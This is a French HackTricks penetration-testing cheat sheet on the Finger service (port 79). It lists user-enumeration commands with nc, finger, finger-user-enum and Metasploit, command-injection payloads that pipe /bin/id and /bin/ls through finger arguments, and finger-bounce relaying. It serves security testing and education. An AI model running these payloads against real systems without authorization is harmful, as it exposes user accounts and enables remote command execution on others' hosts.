79 - Pentesting Finger

Reading time: 2 minutes

tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)

Soutenir HackTricks

Informations de base

Le programme/service Finger est utilisé pour récupérer des détails sur les utilisateurs d'ordinateurs. En général, les informations fournies incluent le nom de connexion de l'utilisateur, le nom complet, et, dans certains cas, des détails supplémentaires. Ces détails supplémentaires peuvent comprendre l'emplacement du bureau et le numéro de téléphone (si disponible), l'heure à laquelle l'utilisateur s'est connecté, la période d'inactivité (temps d'inactivité), la dernière fois que le mail a été lu par l'utilisateur, et le contenu des fichiers de plan et de projet de l'utilisateur.

Port par défaut : 79

PORT   STATE SERVICE
79/tcp open  finger

Énumération

Récupération de bannière/Connexion de base

bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Énumération des utilisateurs

bash
finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Alternativement, vous pouvez utiliser finger-user-enum de pentestmonkey, quelques exemples :

bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap exécute un script en utilisant des scripts par défaut

Metasploit utilise plus de trucs que Nmap

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

Exécution de commandes

bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Finger Bounce

Utiliser un système comme relais de finger

finger user@host@victim
finger @internal@external

tip

Apprenez et pratiquez le hacking AWS :HackTricks Training AWS Red Team Expert (ARTE)
Apprenez et pratiquez le hacking GCP : HackTricks Training GCP Red Team Expert (GRTE)

Soutenir HackTricks